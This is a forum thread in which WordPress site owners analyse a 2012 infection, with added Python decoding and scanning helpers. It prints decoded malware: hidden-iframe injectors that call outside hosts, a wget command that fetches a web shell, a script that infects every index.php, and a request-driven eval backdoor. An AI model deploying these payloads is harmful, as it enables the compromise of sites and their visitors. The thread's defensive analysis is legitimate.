i got my server infected with this thing. it's injecting this code into all index.php files. still haven't been able to find out the cause. i saw similar stuff in the past and it was some file well hidden in the wordpress structure, being accessed remotely and executing some code via this file. index.php contains this:

    <?php eval(base64_decode(' .... (shortened) ')); } else { ?>

after decoding with a base64 decoder you get this:

    error_reporting(0);
    $bot = FALSE ;
    $ua = $_SERVER['HTTP_USER_AGENT'];
    $botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
    foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
    if (!$bot){
        echo(base64_decode(' .... (shortened) '));
    }

first part blocks all robots from accessing such a file. further decoding:

    <script>if(window.document)a=("urf3".split+'tv32hjtkln').substr(0,6);aa=(Date+{}).substr(0,6);if(a===aa)
    f=[ .... (shortened) ];md='a';q="q";e=window.eval;w=f;s='';g='fro'+'mCharCod'+'e';for(i=0;i<w.length;i++){s=s+String[g](37+w[i]);}
    if(a===aa)
    e('e(s)');</script>

we get encoded javascript. more decoding:

    //eval e(s)
    //eval
    if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://itkcmr.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://itkcmr.zyns.com/i/i.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);}
    //document.write (s)
    <iframe src='http://itkcmr.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>
    //jsunpack.url var s = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://itkcmr.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(
    //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://itkcmr.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(

so what this whole thing does is that it places an iframe on your page with this url:

    http://itkcmr.zyns.com/i/i.php?go=1

which contains evil code doing further mess with your computer. watch out for this! and pls report if you know more about prevention and the thing causing this!
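The layers walked through in the post above (base64 inside base64, then an integer array decoded as `String.fromCharCode(37 + w[i])`) can be peeled statically, without running the PHP or the JavaScript. This is an added example, not part of the original post: the function names are assumptions, and the sample is constructed around a harmless string with the same three-layer shape.

```python
import base64
import re

# Offset used by the injected script: s = s + String.fromCharCode(37 + w[i])
CHAR_OFFSET = 37
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")
INT_ARRAY = re.compile(r"=\s*\[(\s*-?\d+(?:\s*,\s*-?\d+)+\s*)\]")
URL = re.compile(r"https?://[^\s'\"<>]+")

def peel_base64(text):
    """Return the decoded body of every base64_decode('...') call in text."""
    out = []
    for m in B64_CALL.finditer(text):
        raw = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
        out.append(raw.decode("latin-1"))
    return out

def peel_charcodes(text, offset=CHAR_OFFSET):
    """Decode every integer array literal as chr(offset + n)."""
    out = []
    for m in INT_ARRAY.finditer(text):
        nums = [int(n) for n in m.group(1).split(",")]
        if all(0 <= n + offset < 0x110000 for n in nums):
            out.append("".join(chr(n + offset) for n in nums))
    return out

def unwrap(text, max_depth=8):
    """Peel nested layers breadth-first; return (all layers, URLs seen)."""
    layers, queue = [], [(text, 0)]
    while queue:
        cur, depth = queue.pop(0)
        layers.append(cur)
        if depth >= max_depth:
            continue  # bound the work on hostile, deeply nested input
        for nxt in peel_base64(cur) + peel_charcodes(cur):
            queue.append((nxt, depth + 1))
    urls = sorted({u for layer in layers for u in URL.findall(layer)})
    return layers, urls

def constructed_sample():
    # Constructed, harmless stand-in: PHP -> base64 -> <script> -> int array.
    inner = "document.title='http://example.invalid/i.php?go=1';"
    arr = ",".join(str(ord(c) - CHAR_OFFSET) for c in inner)
    js = "<script>f=[%s];s='';</script>" % arr
    php = "$bot = FALSE; echo(base64_decode('%s'));" % base64.b64encode(js.encode()).decode()
    return "<?php eval(base64_decode('%s'));" % base64.b64encode(php.encode()).decode()

if __name__ == "__main__":
    layers, urls = unwrap(constructed_sample())
    print(len(layers), urls)
```

Run against a copy of an infected index.php, the returned URL list is what to search for in proxy and DNS logs.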
i was looking through my logs and saw this suspicious request.

    [14/Jan/2012:09:07:18 +0200] "GET //wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgaXNfaHVtYW5fY2xhc3MucGhwJyk7));error HTTP/1.1" 301 5 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

not sure if it's related to this but it contains another encoded string. if you decode it you get this:

    passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt is_human_class.php');

which is apparently a remote shell and the script tries to download it to your server. the script contains this:

    <?php
    $auth_pass = "";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28' .... (shortened)
    ?>

decoded, you get this:

    error_reporting(0);set_time_limit(0);
    $paths = '/path/to/my/site/public_html/index.php';
    $paths = explode(' | ',$paths);
    $frame_old='# *(eval\(base64_decode\(.+\)\);)|(<iframe.+</iframe>)#i';
    $frame_new_php='eval(base64_decode(\' .... \'));';
    $frame_new_htm = '<iframe src="http://yampdfqc.co.tv/i.php?go=1" width="1" height="1"></iframe>';
    foreach($paths as $path) {
        $path = trim($path);
        if(!is_writable($path)) continue;
        $filetime=filemtime ($path);
        $fd=fopen($path,"r");
        $buffer=fread($fd, filesize($path));
        fclose($fd);
        $buffer=preg_replace($frame_old,'',$buffer);
        if (strpos($path,'.php')!==false)
            $buffer=preg_replace('#<\?php#i', '<?php '.$frame_new_php , $buffer , 1);
        else
            $buffer=preg_replace('#<body[^>]*>#i', '\\0'.$frame_new_htm , $buffer , 1);
        $fd=fopen($path, "w");
        fwrite($fd, $buffer);
        fclose($fd);
        touch ($path , $filetime);
    }
    die('1111CHECKSTRING1111');

this is pretty nasty shit which was posted online a few months ago - it basically goes through all your index.php files on the server and injects the remote code into them. however i have disabled the passthru function in the php configuration so this shouldn't be the problem, and the request is almost 1 week old so there must be something else :/
this is still happening, even if you remove the script from index.php it will return in ~30 minutes. this means there is still some infected file on the server which is repeatedly inserting the evil code into index.php files. i haven't been able to find this file yet. the only prevention seems to be chmoding index.php to 444 which prevents it from happening.
Interesting... not seen this happen to any wordpress blogs that we host yet since it's probably being blocked by our settings. But if I get time I will look into how WP is being exploited.
You need to take proper care of your security for your blog. This malicious code attack is very in these days.
I'm also having the same exact issue with all the sites on my server. Originally deleted the eval() from the index files but of course it came back. I'm at a loss for what to do and stressing out over this big time. Has anyone been able to figure this out yet?
ok guys i found out the problem. look through your logs for any accesses to file "wp-content/themes/XXXXXXX/functions.php". if someone is accessing this file directly it's the hacker/bot - there is no reason to access this file directly. i checked this file and there was the evil code allowing remote access and running basically any command on the server:

    eval (base64_decode ("aWYgKGlzc2V0KCRfUkVRVUVTVFsnYXNjJ10pKSB7IGV2YWwoc3RyaXBzbGFzaGVzKCRfUkVRVUVTVFsnYXNjJ10pKTsgZXhpdDsgfS8qIExwVWc1eGJZZVFBQVk5ICov"));

decoded:

    if (isset($_REQUEST['asc'])) { eval(stripslashes($_REQUEST['asc'])); exit; }/* LpUg5xbYeQAAY9 */

i wasn't able to find this before because i was looking for the string "eval(base64" and this one has a space between those two functions.. "eval (base64)". so to fix your problem, use the "find" command in your shell and look through all php files for either "$_REQUEST['asc']" or "eval (base64" and you should find the infected files. in my case it's the functions.php file in the theme folder but it can be any other file probably. the problem still is, how the hell did the attacker insert this string into functions.php in the first place. anyway it seems to be solved for now, good luck with your sites!
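The two checks from the post above, written so that spacing such as "eval (base64_decode (" no longer hides a match, plus the access-log check for direct requests to a theme's functions.php. This is an added example, not code from the thread: the rule names, the theme name `exampletheme`, the file extensions scanned and the log lines are constructed assumptions.

```python
import os
import re
import tempfile

# Whitespace-tolerant: matches eval(base64_decode( and eval (base64_decode (
EVAL_B64 = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
# Shape of the decoded backdoor: eval(stripslashes($_REQUEST['asc']))
REQ_EVAL = re.compile(rb"eval\s*\(\s*(?:stripslashes\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I)
RULES = (("eval_base64", EVAL_B64), ("eval_request", REQ_EVAL))
# Direct requests for a theme's functions.php (WordPress only include()s it)
THEME_HIT = re.compile(r'"(?:GET|POST) \S*/wp-content/themes/[^/\s]+/functions\.php[\s?]')

def scan_tree(root):
    """Return {path: [rule names]} for PHP files matching any rule."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the scan
            rules = [n for n, rx in RULES if rx.search(data)]
            if rules:
                hits[path] = rules
    return hits

def scan_access_log(lines):
    """Return log lines that request a theme functions.php directly."""
    return [ln for ln in lines if THEME_HIT.search(ln)]

def demo():
    # Constructed files and log lines; "QUJD" is base64 for the text "ABC".
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "exampletheme")
        os.makedirs(theme)
        with open(os.path.join(theme, "functions.php"), "w") as fh:
            fh.write('<?php eval (base64_decode ("QUJD")); ?>')
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<?php require('./wp-blog-header.php'); ?>")
        files = {os.path.relpath(p, root): r for p, r in scan_tree(root).items()}
    log = [
        '192.0.2.10 - - [14/Jan/2012:09:07:18 +0200] "POST /wp-content/themes/exampletheme/functions.php HTTP/1.1" 200 5',
        '192.0.2.11 - - [14/Jan/2012:09:08:02 +0200] "GET /index.php HTTP/1.1" 200 5120',
    ]
    return files, scan_access_log(log)

if __name__ == "__main__":
    print(demo())
```

A hit from `scan_tree` is a lead for manual review, since some legitimate plugins also call `eval(base64_decode(`.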
this should have nothing to do with this - it relates only to new, not installed blogs with setup files present on server.
Had a similar problem; turned out that a virus was affecting through the FTP program on my PC - this could explain why all 50 of your sites were compromised if you use an FTP program. Details from Sucuri site check:

"Description: A hidden and malicious iframe was identified. This malware infects a web site through a compromised desktop (with virus), where it steals any stored password from the FTP client and uses that to attack the site. Note that every PHP, HTML and JS file gets compromised by this malware.
Affecting: Any web site with FTP enabled (and password stolen).
Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this virus is very good at hiding from the current AV that is running. Once it is clean, then you can clean up the sites and change the passwords.
Loads malware from multiple sources: "
You should use chmod on some files in order to revoke the writing permissions for hackers. I guess you forgot that after installation - just an idea.
I have been dealing with the same issue now on my server for over a week. Well today I was looking at server logs, and noticed that someone from China was logging into one of my Wordpress sites over 3000 times in the last week! I think he had an automated script that logged into my website and then somehow through an exploit was changing the index.php and index.html files on ALL of my websites. I changed the password to the website and blocked his IP. Check your server logs and see if you have a weird IP address hitting one of your ../wp-admin files.
InstantLinkStorm, i think this has nothing to do with a virus on my computer, i have multiple ftp logins and only this one was affected. earnnet, as i said, i turned those files to chmod 444 however it's not a solution - i need to edit them from time to time too and changing it back to 644 or more for editing and then back to 444 is kind of annoying...
Dev, did you check your server logs to see if one of your site's logins was compromised? I too had multiple ftp logins AND multiple cpanels on my server. The only 1 that got hacked was the one with the website whose login had been compromised. I have changed that password and blocked the IP for the user that was accessing it (from china and accessed my wp-admin over 3000 times). Since I made those changes my files haven't been changed. I think I got it.